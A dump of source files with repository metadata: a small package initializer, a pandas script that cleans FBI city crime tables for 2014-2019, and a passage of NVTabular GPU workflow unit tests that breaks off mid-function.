| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
f189c7feea6052514ea214148b48ad9dff98af07
| 76
|
py
|
Python
|
accepted/chennaipy/october/samplecode/absoluteimports/__init__.py
|
tasdikrahman/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2017-04-16T06:59:02.000Z
|
2017-04-16T06:59:02.000Z
|
accepted/chennaipy/october/samplecode/absoluteimports/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | null | null | null |
accepted/chennaipy/october/samplecode/absoluteimports/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2019-10-26T00:28:07.000Z
|
2019-10-26T00:28:07.000Z
|
# absoluteimports/__init__.py
# Package initializer for the absolute-imports demo: the print fires when the
# package is first imported, making the import order visible at runtime.
print("inside absoluteimports/__init__.py")
| 15.2
| 43
| 0.802632
| 8
| 76
| 6.625
| 0.625
| 0.716981
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 76
| 4
| 44
| 19
| 0.757143
| 0.355263
| 0
| 0
| 0
| 0
| 0.73913
| 0.586957
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 10
|
74b7e6749fb65b6903ee37acac377f33eb09591e
| 11,104
|
py
|
Python
|
scripts/crime/crime.py
|
RMDircio/cityspire-a-ds
|
979ffaec9e92c0042b88a37d834261dbd98f9177
|
[
"MIT"
] | 1
|
2021-02-18T04:39:36.000Z
|
2021-02-18T04:39:36.000Z
|
scripts/crime/crime.py
|
RMDircio/cityspire-a-ds
|
979ffaec9e92c0042b88a37d834261dbd98f9177
|
[
"MIT"
] | 7
|
2021-02-02T02:43:47.000Z
|
2021-02-21T06:02:02.000Z
|
scripts/crime/crime.py
|
RMDircio/cityspire-a-ds
|
979ffaec9e92c0042b88a37d834261dbd98f9177
|
[
"MIT"
] | 4
|
2021-01-21T02:38:50.000Z
|
2021-03-03T02:17:37.000Z
|
import pandas as pd
import numpy as np
# Raw FBI UCR "Offenses Known to Law Enforcement" city-level tables, one sheet
# per year (2016 was published as Table 6, the 2014 release as a generic name).
# NOTE(review): paths are relative to the working directory — presumably the
# script is run from the repository root; confirm before automating.
crime_2019 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2019.xls')
crime_2018 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2018.xls')
crime_2017 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2017.xls')
crime_2016 = pd.read_excel('./data/Table_6_Offenses_Known_to_Law_Enforcement_by_State_by_City_2016.xls')
crime_2015 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2015.xls')
crime_2014 = pd.read_excel('./data/table-8.xls')
def clean_2019(df):
    '''
    Preprocess the raw 2019 FBI "Offenses Known" sheet for modeling.

    df: raw data frame loaded from the 2019 Excel table
    returns: cleaned frame with State, City, Population, Violent crime,
             Property crime plus derived 'year' and 'City, State' columns
    '''
    # The last 8 rows of the sheet are footnotes, not data.
    df = df.drop(df.tail(8).index)
    # The state name appears only on its first row; forward-fill the rest.
    # (fillna(method='ffill') is deprecated; .ffill() is the supported form.)
    df['State'] = df['State'].ffill()
    # Keep only the part of the state label before any '-' suffix.
    df['State'] = df['State'].str.split("-", n=1, expand=True)[0]
    # Footnote-marker fix: "ALABAMA3" -> "ALABAMA".
    df['State'] = df['State'].str.replace('ALABAMA3', 'ALABAMA', regex=False)
    # Sheet headers contain embedded newlines.
    df.columns = df.columns.str.replace('\n', ' ')
    df = df.rename(columns={'Arson2': 'Arson'})
    # Drop the per-offense columns; only the aggregate counts are kept.
    df.drop(['Rape1', 'Murder and nonnegligent manslaughter', 'Robbery', 'Aggravated assault',
             'Burglary', 'Motor vehicle theft', 'Arson', 'Larceny- theft'], axis=1, inplace=True)
    # Lowercase every string cell (applymap is deprecated; map per column).
    df = df.apply(lambda col: col.map(lambda s: s.lower() if isinstance(s, str) else s))
    # Missing aggregate counts mean zero offenses reported.
    zeros = ['Violent crime', 'Property crime']
    df[zeros] = df[zeros].fillna(value=0)
    # Strip agency suffixes and footnote characters from city names.
    # BUG FIX: these patterns were previously capitalized, but the frame has
    # already been lowercased above, so the replacements never matched.
    for junk in (' county police department', ' police department', ' county',
                 '7', '5', '3', "'s"):
        df['City'] = df['City'].str.replace(junk, '', regex=False)
    # Tag the source year and a combined lookup key.
    df['year'] = 2019
    df['City, State'] = df.City + ", " + df.State
    print(df.head(3))
    return df
def clean_2018(df):
    '''
    Preprocess the raw 2018 FBI "Offenses Known" sheet for modeling.

    df: raw data frame loaded from the 2018 Excel table
    returns: cleaned frame with State, City, Population, Violent crime,
             Property crime plus derived 'year' and 'City, State' columns
    '''
    # The last 10 rows of the sheet are footnotes, not data.
    df = df.drop(df.tail(10).index)
    # The state name appears only on its first row; forward-fill the rest.
    # (fillna(method='ffill') is deprecated; .ffill() is the supported form.)
    df['State'] = df['State'].ffill()
    # Keep only the part of the state label before any '-' suffix.
    df['State'] = df['State'].str.split("-", n=1, expand=True)[0]
    # Footnote-marker fixes on state names.
    df['State'] = df['State'].str.replace('IOWA7', 'IOWA', regex=False)
    df['State'] = df['State'].str.replace('NORTH CAROLINA8', 'NORTH CAROLINA', regex=False)
    # Sheet headers contain embedded newlines.
    df.columns = df.columns.str.replace('\n', ' ')
    # Drop the per-offense columns; only the aggregate counts are kept.
    df.drop(['Rape', 'Murder and nonnegligent manslaughter', 'Robbery', 'Aggravated assault',
             'Burglary', 'Motor vehicle theft', 'Arson', 'Larceny- theft'], axis=1, inplace=True)
    # Lowercase every string cell (applymap is deprecated; map per column).
    df = df.apply(lambda col: col.map(lambda s: s.lower() if isinstance(s, str) else s))
    # Missing aggregate counts mean zero offenses reported.
    zeros = ['Violent crime', 'Property crime']
    df[zeros] = df[zeros].fillna(value=0)
    # Strip agency suffixes and footnote characters from city names.
    # BUG FIX: these patterns were previously capitalized, but the frame has
    # already been lowercased above, so the replacements never matched.
    for junk in (' county police department', ' police department', ' county',
                 '7', '5', '3', "'s"):
        df['City'] = df['City'].str.replace(junk, '', regex=False)
    # Tag the source year and a combined lookup key.
    df['year'] = 2018
    df['City, State'] = df.City + ", " + df.State
    print(df.head(3))
    return df
def clean_2017(df):
    '''
    Preprocess the raw 2017 FBI "Offenses Known" sheet for modeling.

    df: raw data frame loaded from the 2017 Excel table
    returns: cleaned frame with State, City, Population, Violent crime,
             Property crime plus derived 'year' and 'City, State' columns
    '''
    # The last 10 rows of the sheet are footnotes, not data.
    df = df.drop(df.tail(10).index)
    # The state name appears only on its first row; forward-fill the rest.
    # (fillna(method='ffill') is deprecated; .ffill() is the supported form.)
    df['State'] = df['State'].ffill()
    # Keep only the part of the state label before any '-' suffix.
    df['State'] = df['State'].str.split("-", n=1, expand=True)[0]
    # Sheet headers contain embedded newlines.
    df.columns = df.columns.str.replace('\n', ' ')
    # Keep only the columns needed for modeling; drop everything else.
    drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
    df = df.drop(df.columns.difference(drop_list), axis=1)
    # Lowercase every string cell (applymap is deprecated; map per column).
    df = df.apply(lambda col: col.map(lambda s: s.lower() if isinstance(s, str) else s))
    # Missing aggregate counts mean zero offenses reported.
    zeros = ['Violent crime', 'Property crime']
    df[zeros] = df[zeros].fillna(value=0)
    # Strip agency suffixes and footnote characters from city names.
    # BUG FIX: these patterns were previously capitalized, but the frame has
    # already been lowercased above, so the replacements never matched.
    for junk in (' county police department', ' police department', ' county',
                 '7', '5', '3', "'s"):
        df['City'] = df['City'].str.replace(junk, '', regex=False)
    # Tag the source year and a combined lookup key.
    df['year'] = 2017
    df['City, State'] = df.City + ", " + df.State
    print(df.head(3))
    return df
def clean_2016(df):
    '''
    Preprocess the raw 2016 FBI "Offenses Known" sheet for modeling.

    df: raw data frame loaded from the 2016 Excel table
    returns: cleaned frame with State, City, Population, Violent crime,
             Property crime plus derived 'year' and 'City, State' columns
    '''
    # The last 11 rows of the sheet are footnotes, not data.
    df = df.drop(df.tail(11).index)
    # The state name appears only on its first row; forward-fill the rest.
    # (fillna(method='ffill') is deprecated; .ffill() is the supported form.)
    df['State'] = df['State'].ffill()
    # Keep only the part of the state label before any '-' suffix.
    df['State'] = df['State'].str.split("-", n=1, expand=True)[0]
    # Sheet headers contain embedded newlines.
    df.columns = df.columns.str.replace('\n', ' ')
    # Keep only the columns needed for modeling; drop everything else.
    drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
    df = df.drop(df.columns.difference(drop_list), axis=1)
    # Lowercase every string cell (applymap is deprecated; map per column).
    df = df.apply(lambda col: col.map(lambda s: s.lower() if isinstance(s, str) else s))
    # Missing aggregate counts mean zero offenses reported.
    zeros = ['Violent crime', 'Property crime']
    df[zeros] = df[zeros].fillna(value=0)
    # Strip agency suffixes and footnote characters from city names.
    # BUG FIX: these patterns were previously capitalized, but the frame has
    # already been lowercased above, so the replacements never matched.
    for junk in (' county police department', ' police department', ' county',
                 '7', '5', '3', "'s"):
        df['City'] = df['City'].str.replace(junk, '', regex=False)
    # Tag the source year and a combined lookup key.
    df['year'] = 2016
    df['City, State'] = df.City + ", " + df.State
    print(df.head(3))
    return df
def clean_2015(df):
    '''
    Preprocess the raw 2015 FBI "Offenses Known" sheet for modeling.

    df: raw data frame loaded from the 2015 Excel table
    returns: cleaned frame with State, City, Population, Violent crime,
             Property crime plus derived 'year' and 'City, State' columns
    '''
    # The last 10 rows of the sheet are footnotes, not data.
    df = df.drop(df.tail(10).index)
    # The state name appears only on its first row; forward-fill the rest.
    # (fillna(method='ffill') is deprecated; .ffill() is the supported form.)
    df['State'] = df['State'].ffill()
    # Keep only the part of the state label before any '-' suffix.
    df['State'] = df['State'].str.split("-", n=1, expand=True)[0]
    # Footnote-marker fix: "NEW JERSEY9" -> "NEW JERSEY".
    df['State'] = df['State'].str.replace('NEW JERSEY9', 'NEW JERSEY', regex=False)
    # Sheet headers contain embedded newlines.
    df.columns = df.columns.str.replace('\n', ' ')
    # Keep only the columns needed for modeling; drop everything else.
    drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
    df = df.drop(df.columns.difference(drop_list), axis=1)
    # Lowercase every string cell (applymap is deprecated; map per column).
    df = df.apply(lambda col: col.map(lambda s: s.lower() if isinstance(s, str) else s))
    # Missing aggregate counts mean zero offenses reported.
    zeros = ['Violent crime', 'Property crime']
    df[zeros] = df[zeros].fillna(value=0)
    # Strip agency suffixes and footnote characters from city names.
    # BUG FIX: these patterns were previously capitalized, but the frame has
    # already been lowercased above, so the replacements never matched.
    for junk in (' county police department', ' police department', ' county',
                 '7', '5', '3', "'s"):
        df['City'] = df['City'].str.replace(junk, '', regex=False)
    # Tag the source year and a combined lookup key.
    df['year'] = 2015
    df['City, State'] = df.City + ", " + df.State
    print(df.head(3))
    return df
def clean_2014(df):
    '''
    Preprocess the raw 2014 FBI "Offenses Known" sheet for modeling.

    df: raw data frame loaded from the 2014 Excel table
    returns: cleaned frame with State, City, Population, Violent crime,
             Property crime plus derived 'year' and 'City, State' columns
    '''
    # The last 17 rows of the sheet are footnotes, not data.
    df = df.drop(df.tail(17).index)
    # The state name appears only on its first row; forward-fill the rest.
    # (fillna(method='ffill') is deprecated; .ffill() is the supported form.)
    df['State'] = df['State'].ffill()
    # Keep only the part of the state label before any '-' suffix.
    df['State'] = df['State'].str.split("-", n=1, expand=True)[0]
    # Footnote-marker fix: "GEORGIA7" -> "GEORGIA".
    df['State'] = df['State'].str.replace('GEORGIA7', 'GEORGIA', regex=False)
    # Sheet headers contain embedded newlines.
    df.columns = df.columns.str.replace('\n', ' ')
    # Keep only the columns needed for modeling; drop everything else.
    drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
    df = df.drop(df.columns.difference(drop_list), axis=1)
    # Lowercase every string cell (applymap is deprecated; map per column).
    df = df.apply(lambda col: col.map(lambda s: s.lower() if isinstance(s, str) else s))
    # Missing aggregate counts mean zero offenses reported.
    zeros = ['Violent crime', 'Property crime']
    df[zeros] = df[zeros].fillna(value=0)
    # Strip agency suffixes and footnote characters from city names.
    # BUG FIX: these patterns were previously capitalized, but the frame has
    # already been lowercased above, so the replacements never matched.
    for junk in (' county police department', ' police department', ' county',
                 '7', '5', '3', "'s"):
        df['City'] = df['City'].str.replace(junk, '', regex=False)
    # Tag the source year and a combined lookup key.
    df['year'] = 2014
    df['City, State'] = df.City + ", " + df.State
    print(df.head(3))
    return df
# Run each year's cleaner over its raw frame, rebinding the module-level names.
crime_2014 = clean_2014(crime_2014)
crime_2015 = clean_2015(crime_2015)
crime_2016 = clean_2016(crime_2016)
crime_2017 = clean_2017(crime_2017)
crime_2018 = clean_2018(crime_2018)
crime_2019 = clean_2019(crime_2019)
# Persist the cleaned frames as CSVs (written to the working directory)
# for downstream modeling.
crime_2019.to_csv('crime_2019.csv')
crime_2018.to_csv('crime_2018.csv')
crime_2017.to_csv('crime_2017.csv')
crime_2016.to_csv('crime_2016.csv')
crime_2015.to_csv('crime_2015.csv')
crime_2014.to_csv('crime_2014.csv')
| 33.957187
| 104
| 0.558988
| 1,457
| 11,104
| 4.179822
| 0.100206
| 0.094581
| 0.063054
| 0.082759
| 0.8867
| 0.877833
| 0.83202
| 0.827258
| 0.811002
| 0.804105
| 0
| 0.039093
| 0.26513
| 11,104
| 326
| 105
| 34.06135
| 0.70723
| 0.167777
| 0
| 0.727848
| 0
| 0
| 0.237184
| 0.041143
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0
| 0.012658
| 0
| 0.088608
| 0.037975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d03608e766f4c2bb53e71a36496565b2d1542dd
| 15,493
|
py
|
Python
|
tests/unit/test_workflow.py
|
benfred/NVTabular
|
5ab6d557868ac01eda26e9725a1a6e5bf7eda007
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_workflow.py
|
benfred/NVTabular
|
5ab6d557868ac01eda26e9725a1a6e5bf7eda007
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_workflow.py
|
benfred/NVTabular
|
5ab6d557868ac01eda26e9725a1a6e5bf7eda007
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import math
import cudf
import numpy as np
import pytest
from cudf.tests.utils import assert_eq
import nvtabular as nvt
import nvtabular.io
import nvtabular.ops as ops
from tests.conftest import allcols_csv, cleanup, mycols_csv, mycols_pq
@cleanup
@pytest.mark.parametrize("gpu_memory_frac", [0.01, 0.1])
@pytest.mark.parametrize("engine", ["parquet", "csv", "csv-no-header"])
@pytest.mark.parametrize("dump", [True, False])
@pytest.mark.parametrize("op_columns", [["x"], None])
def test_gpu_workflow_api(tmpdir, datasets, dump, gpu_memory_frac, engine, op_columns):
    """End-to-end Workflow API check: feature ops, computed stats, optional
    stats dump/reload, and a shuffled dataset export."""
    paths = glob.glob(str(datasets[engine]) + "/*." + engine.split("-")[0])
    # Read the raw data directly so computed stats can be checked against it.
    if engine == "parquet":
        df1 = cudf.read_parquet(paths[0])[mycols_pq]
        df2 = cudf.read_parquet(paths[1])[mycols_pq]
    else:
        df1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
        df2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
    df = cudf.concat([df1, df2], axis=0)
    df["id"] = df["id"].astype("int64")
    if engine == "parquet":
        cat_names = ["name-cat", "name-string"]
        columns = mycols_pq
    else:
        cat_names = ["name-string"]
        columns = mycols_csv
    cont_names = ["x", "y", "id"]
    label_name = ["label"]
    processor = nvt.Workflow(
        cat_names=cat_names, cont_names=cont_names, label_name=label_name, to_cpu=False,
    )
    processor.add_feature([ops.ZeroFill(columns=op_columns), ops.LogOp()])
    processor.add_preprocess(ops.Normalize())
    processor.add_preprocess(ops.Categorify())
    processor.finalize()
    data_itr = nvtabular.io.GPUDatasetIterator(
        paths,
        columns=columns,
        use_row_groups=True,
        gpu_memory_frac=gpu_memory_frac,
        names=allcols_csv,
    )
    processor.update_stats(data_itr)
    if dump:
        # Round-trip the stats through a dump file to verify persistence.
        config_file = tmpdir + "/temp.yaml"
        processor.save_stats(config_file)
        processor.clear_stats()
        processor.load_stats(config_file)

    def get_norms(tar: cudf.Series):
        # Reference implementation of ZeroFill + LogOp for the stats checks.
        gdf = tar.fillna(0)
        gdf = gdf * (gdf >= 0).astype("int")
        gdf = np.log(gdf + 1)
        return gdf

    # Check mean and std - No good right now we have to add all other changes; Zerofill, Log
    if not op_columns:
        assert math.isclose(get_norms(df.y).mean(), processor.stats["means"]["y"], rel_tol=1e-1,)
        assert math.isclose(get_norms(df.y).std(), processor.stats["stds"]["y"], rel_tol=1e-1,)
        assert math.isclose(get_norms(df.x).mean(), processor.stats["means"]["x"], rel_tol=1e-1,)
        assert math.isclose(get_norms(df.x).std(), processor.stats["stds"]["x"], rel_tol=1e-1,)
    # Check that categories match
    if engine == "parquet":
        cats_expected0 = df["name-cat"].unique().values_to_string()
        cats0 = processor.stats["encoders"]["name-cat"].get_cats().values_to_string()
        # adding the None entry as a string because of move from gpu
        assert cats0 == ["None"] + cats_expected0
    cats_expected1 = df["name-string"].unique().values_to_string()
    cats1 = processor.stats["encoders"]["name-string"].get_cats().values_to_string()
    # adding the None entry as a string because of move from gpu
    assert cats1 == ["None"] + cats_expected1
    # Write to new "shuffled" and "processed" dataset
    processor.write_to_dataset(tmpdir, data_itr, nfiles=10, shuffle=True, apply_ops=True)
    data_itr_2 = nvtabular.io.GPUDatasetIterator(
        glob.glob(str(tmpdir) + "/ds_part.*.parquet"),
        use_row_groups=True,
        gpu_memory_frac=gpu_memory_frac,
    )
    df_pp = None
    for chunk in data_itr_2:
        # BUG FIX: `if df_pp` truth-tests a DataFrame, which is ambiguous
        # under pandas semantics (raises ValueError once df_pp is a frame);
        # test for the None sentinel explicitly instead.
        df_pp = chunk if df_pp is None else cudf.concat([df_pp, chunk], axis=0)
    if engine == "parquet":
        assert df_pp["name-cat"].dtype == "int64"
    assert df_pp["name-string"].dtype == "int64"
    num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(str(tmpdir) + "/_metadata")
    assert num_rows == len(df_pp)
    return processor.ds_exports
@pytest.mark.parametrize("batch", [0, 100, 1000])
def test_gpu_file_iterator_parquet(datasets, batch):
    """Stream one parquet file through GPUFileIterator and compare the
    concatenated chunks against a direct cudf read."""
    paths = glob.glob(str(datasets["parquet"]) + "/*.parquet")
    df_expect = cudf.read_parquet(paths[0], columns=mycols_pq)
    df_itr = cudf.DataFrame()
    data_itr = nvtabular.io.GPUFileIterator(
        paths[0], batch_size=batch, gpu_memory_frac=0.01, columns=mycols_pq
    )
    for data_gd in data_itr:
        # BUG FIX: `if df_itr` truth-tests a DataFrame, which is ambiguous
        # under pandas semantics; check emptiness via len() instead.
        df_itr = cudf.concat([df_itr, data_gd], axis=0) if len(df_itr) else data_gd
    assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@pytest.mark.parametrize("batch", [0, 100, 1000])
@pytest.mark.parametrize("dskey", ["csv", "csv-no-header"])
def test_gpu_file_iterator_csv(datasets, batch, dskey):
    """Stream one csv file through GPUFileIterator and compare the
    concatenated chunks against a direct cudf read."""
    paths = glob.glob(str(datasets[dskey]) + "/*.csv")
    names = allcols_csv if dskey == "csv-no-header" else None
    df_expect = cudf.read_csv(paths[0], header=False, names=names)[mycols_csv]
    df_expect["id"] = df_expect["id"].astype("int64")
    df_itr = cudf.DataFrame()
    data_itr = nvtabular.io.GPUFileIterator(
        paths[0], batch_size=batch, gpu_memory_frac=0.01, columns=mycols_csv, names=names,
    )
    for data_gd in data_itr:
        # BUG FIX: `if df_itr` truth-tests a DataFrame, which is ambiguous
        # under pandas semantics; check emptiness via len() instead.
        df_itr = cudf.concat([df_itr, data_gd], axis=0) if len(df_itr) else data_gd
    assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@pytest.mark.parametrize("batch", [0, 100, 1000])
def test_gpu_dataset_iterator_parquet(datasets, batch):
    """Iterate a multi-file parquet dataset with GPUDatasetIterator and
    verify the concatenated chunks equal reading the two files directly.
    """
    parquet_paths = glob.glob(str(datasets["parquet"]) + "/*.parquet")
    frames = [cudf.read_parquet(p, columns=mycols_pq) for p in parquet_paths[:2]]
    df_expect = cudf.concat(frames, axis=0)
    ds_itr = nvtabular.io.GPUDatasetIterator(
        parquet_paths, batch_size=batch, gpu_memory_frac=0.01, columns=mycols_pq
    )
    df_itr = cudf.DataFrame()
    for chunk in ds_itr:
        df_itr = cudf.concat([df_itr, chunk], axis=0) if df_itr else chunk
    assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@pytest.mark.parametrize("batch", [0, 100, 1000])
@pytest.mark.parametrize("dskey", ["csv", "csv-no-header"])
def test_gpu_dataset_iterator_csv(datasets, batch, dskey):
    """Iterate a multi-file csv dataset with GPUDatasetIterator and verify
    the concatenated chunks equal reading the two files directly.
    """
    csv_paths = glob.glob(str(datasets[dskey]) + "/*.csv")
    frames = [
        cudf.read_csv(p, header=False, names=allcols_csv)[mycols_csv]
        for p in csv_paths[:2]
    ]
    df_expect = cudf.concat(frames, axis=0)
    df_expect["id"] = df_expect["id"].astype("int64")
    ds_itr = nvtabular.io.GPUDatasetIterator(
        csv_paths, batch_size=batch, gpu_memory_frac=0.01, columns=mycols_csv, names=allcols_csv,
    )
    df_itr = cudf.DataFrame()
    for chunk in ds_itr:
        df_itr = cudf.concat([df_itr, chunk], axis=0) if df_itr else chunk
    assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@cleanup
@pytest.mark.parametrize("gpu_memory_frac", [0.01, 0.1])
@pytest.mark.parametrize("engine", ["parquet", "csv", "csv-no-header"])
@pytest.mark.parametrize("dump", [True, False])
def test_gpu_workflow(tmpdir, datasets, dump, gpu_memory_frac, engine):
    """End-to-end Workflow test for ZeroFill/Normalize/Categorify ops.

    Gathers statistics over the dataset, optionally round-trips them
    through a YAML dump/load, checks means/stds and category sets against
    an independent recomputation on the raw frame, then writes a shuffled
    processed dataset and validates its parquet _metadata row count.
    """
    paths = glob.glob(str(datasets[engine]) + "/*." + engine.split("-")[0])
    # Build the reference frame by reading the first two files directly.
    if engine == "parquet":
        df1 = cudf.read_parquet(paths[0])[mycols_pq]
        df2 = cudf.read_parquet(paths[1])[mycols_pq]
    else:
        df1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
        df2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
    df = cudf.concat([df1, df2], axis=0)
    df["id"] = df["id"].astype("int64")
    # The csv fixtures carry only one categorical column.
    if engine == "parquet":
        cat_names = ["name-cat", "name-string"]
        columns = mycols_pq
    else:
        cat_names = ["name-string"]
        columns = mycols_csv
    cont_names = ["x", "y", "id"]
    label_name = ["label"]
    config = nvt.workflow.get_new_config()
    config["FE"]["continuous"] = [ops.ZeroFill()]
    config["PP"]["continuous"] = [[ops.ZeroFill(), ops.Normalize()]]
    config["PP"]["categorical"] = [ops.Categorify()]
    processor = nvt.Workflow(
        cat_names=cat_names,
        cont_names=cont_names,
        label_name=label_name,
        config=config,
        to_cpu=False,
    )
    data_itr = nvtabular.io.GPUDatasetIterator(
        paths,
        columns=columns,
        use_row_groups=True,
        gpu_memory_frac=gpu_memory_frac,
        names=allcols_csv,
    )
    processor.update_stats(data_itr)
    if dump:
        # Exercise save/clear/load so the assertions below run against
        # stats that survived a YAML round trip.
        config_file = tmpdir + "/temp.yaml"
        processor.save_stats(config_file)
        processor.clear_stats()
        processor.load_stats(config_file)

    def get_norms(tar: cudf.Series):
        # Reference ZeroFill: NAs -> 0, negatives clamped to 0.
        gdf = tar.fillna(0)
        gdf = gdf * (gdf >= 0).astype("int")
        return gdf

    assert math.isclose(get_norms(df.x).mean(), processor.stats["means"]["x"], rel_tol=1e-4)
    assert math.isclose(get_norms(df.y).mean(), processor.stats["means"]["y"], rel_tol=1e-4)
    # assert math.isclose(get_norms(df.id).mean(),
    # processor.stats["means"]["id_ZeroFill_LogOp"], rel_tol=1e-4)
    assert math.isclose(get_norms(df.x).std(), processor.stats["stds"]["x"], rel_tol=1e-3)
    assert math.isclose(get_norms(df.y).std(), processor.stats["stds"]["y"], rel_tol=1e-3)
    # assert math.isclose(get_norms(df.id).std(),
    # processor.stats["stds"]["id_ZeroFill_LogOp"], rel_tol=1e-3)
    # Check that categories match
    if engine == "parquet":
        cats_expected0 = df["name-cat"].unique().values_to_string()
        cats0 = processor.stats["encoders"]["name-cat"].get_cats().values_to_string()
        # adding the None entry as a string because of move from gpu
        assert cats0 == ["None"] + cats_expected0
    cats_expected1 = df["name-string"].unique().values_to_string()
    cats1 = processor.stats["encoders"]["name-string"].get_cats().values_to_string()
    # adding the None entry as a string because of move from gpu
    assert cats1 == ["None"] + cats_expected1
    # Write to new "shuffled" and "processed" dataset
    processor.write_to_dataset(tmpdir, data_itr, nfiles=10, shuffle=True, apply_ops=True)
    data_itr_2 = nvtabular.io.GPUDatasetIterator(
        glob.glob(str(tmpdir) + "/ds_part.*.parquet"),
        use_row_groups=True,
        gpu_memory_frac=gpu_memory_frac,
    )
    df_pp = None
    for chunk in data_itr_2:
        df_pp = cudf.concat([df_pp, chunk], axis=0) if df_pp else chunk
    # Categorify must have turned string categories into int64 codes.
    if engine == "parquet":
        assert df_pp["name-cat"].dtype == "int64"
    assert df_pp["name-string"].dtype == "int64"
    # The written _metadata footer must agree with the data actually read.
    num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(str(tmpdir) + "/_metadata")
    assert num_rows == len(df_pp)
    return processor.ds_exports
@pytest.mark.parametrize("gpu_memory_frac", [0.01, 0.1])
@pytest.mark.parametrize("engine", ["parquet", "csv", "csv-no-header"])
@pytest.mark.parametrize("dump", [True, False])
@pytest.mark.parametrize("replace", [True, False])
def test_gpu_workflow_config(tmpdir, datasets, dump, gpu_memory_frac, engine, replace):
    """Workflow test with chained ops (FillMissing -> LogOp -> Normalize).

    `replace` toggles whether each op overwrites its input column or adds
    a suffixed output column; the stats keys below change accordingly.
    """
    paths = glob.glob(str(datasets[engine]) + "/*." + engine.split("-")[0])
    # Build the reference frame by reading the first two files directly.
    if engine == "parquet":
        df1 = cudf.read_parquet(paths[0])[mycols_pq]
        df2 = cudf.read_parquet(paths[1])[mycols_pq]
    else:
        df1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
        df2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
    df = cudf.concat([df1, df2], axis=0)
    df["id"] = df["id"].astype("int64")
    if engine == "parquet":
        cat_names = ["name-cat", "name-string"]
        columns = mycols_pq
    else:
        cat_names = ["name-string"]
        columns = mycols_csv
    cont_names = ["x", "y", "id"]
    label_name = ["label"]
    config = nvt.workflow.get_new_config()
    # add operators with dependencies
    config["FE"]["continuous"] = [[ops.FillMissing(replace=replace), ops.LogOp()]]
    config["PP"]["continuous"] = [[ops.LogOp(replace=replace), ops.Normalize()]]
    config["PP"]["categorical"] = [ops.Categorify()]
    processor = nvt.Workflow(
        cat_names=cat_names,
        cont_names=cont_names,
        label_name=label_name,
        config=config,
        to_cpu=False,
    )
    # NOTE(review): uses nvt.io here vs nvtabular.io elsewhere in the file —
    # presumably the same module under two import aliases; confirm.
    data_itr = nvt.io.GPUDatasetIterator(
        paths,
        columns=columns,
        use_row_groups=True,
        gpu_memory_frac=gpu_memory_frac,
        names=allcols_csv,
    )
    processor.update_stats(data_itr)
    if dump:
        # Exercise save/clear/load so the assertions below run against
        # stats that survived a YAML round trip.
        config_file = tmpdir + "/temp.yaml"
        processor.save_stats(config_file)
        processor.clear_stats()
        processor.load_stats(config_file)

    def get_norms(tar: cudf.Series):
        # Reference FillMissing (median) followed by LogOp (log1p).
        ser_median = tar.dropna().quantile(0.5, interpolation="linear")
        gdf = tar.fillna(ser_median)
        gdf = np.log(gdf + 1)
        return gdf

    # Check mean and std - No good right now we have to add all other changes; Zerofill, Log
